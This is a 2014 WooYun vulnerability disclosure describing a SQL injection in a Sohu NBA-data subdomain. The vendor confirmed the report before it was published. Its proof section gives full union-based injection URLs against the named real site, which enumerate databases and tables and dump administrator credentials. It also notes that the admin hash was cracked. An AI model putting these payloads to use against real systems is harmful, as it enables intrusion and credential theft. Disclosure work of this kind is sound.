漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-047991
漏洞标题:搜狐某分站SQL注入漏洞,权限比较大
相关厂商:搜狐
漏洞作者: txcbg
提交时间:2014-01-06 10:10
修复时间:2014-02-20 10:11
公开时间:2014-02-20 10:11
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-06: 厂商已经确认,细节仅向厂商公开
2014-01-16: 细节向核心白帽子及相关领域专家公开
2014-01-26: 细节向普通白帽子公开
2014-02-05: 细节向实习白帽子公开
2014-02-20: 细节向公众公开
简要描述:
搜狐某分站sql注入漏洞,权限比较大。
详细说明:
搜狐的一个分站:NBA数据库 http://nbadata.m.sohu.com/存在明显的注入漏洞,并且连接数据库的用户权限比较大,可以跨库查询多个数据库中的敏感信息。
漏洞证明:
注入点地址为:http://nbadata.m.sohu.com/nba/player.php?id=4483,参数id没有做适当的过滤,典型的数字型注入漏洞。直接访问如下地址就可以获得当前连接数据库的用户名和当前数据库的名字:
http://nbadata.m.sohu.com/nba/player.php?id=4483 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database()--
可以看到接当前数据库的用户名为in,当前数据库的名字为nba,如图1。
发现可以列出多个数据库的名字,说明当前连接数据库的用户权限比较大。列出所有数据库的语句为:
http://nbadata.m.sohu.com/nba/player.php?id=4483 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,unhex(hex(group_concat(SCHEMA_NAME))),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.SCHEMATA--
结果如图2,列出的数据库真不少。
再来看下当前数据库中都有哪些表,访问如下地址:
http://nbadata.m.sohu.com/nba/player.php?id=4483 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,unhex(hex(group_concat(TABLE_NAME))),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.TABLES where TABLE_SCHEMA=0x6E6261--
结果如图3。
爆出管理员信息的语句如下:
http://nbadata.m.sohu.com/nba/player.php?id=4483 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,manage_id,manage_name,manage_pwd,real_name),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from manage--
结果如图4。管理员的密码虽然是加密过的hash,但发现在CMD5可以破解,如图5。
用sqlmap发现可以读其它数据库用户的密码,说明当前连接数据库用户的权限比较大。如图6。
好了,点到为止吧,足以证明存在注入漏洞了吧。
修复方案:
你们更专业。
话说快过年了,能不能送个公仔啊,想送给家里的孩子,嘻嘻。
版权声明:转载请注明来源 txcbg@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-01-06 10:20
厂商回复:
感谢关注搜狐安全
最新状态:
暂无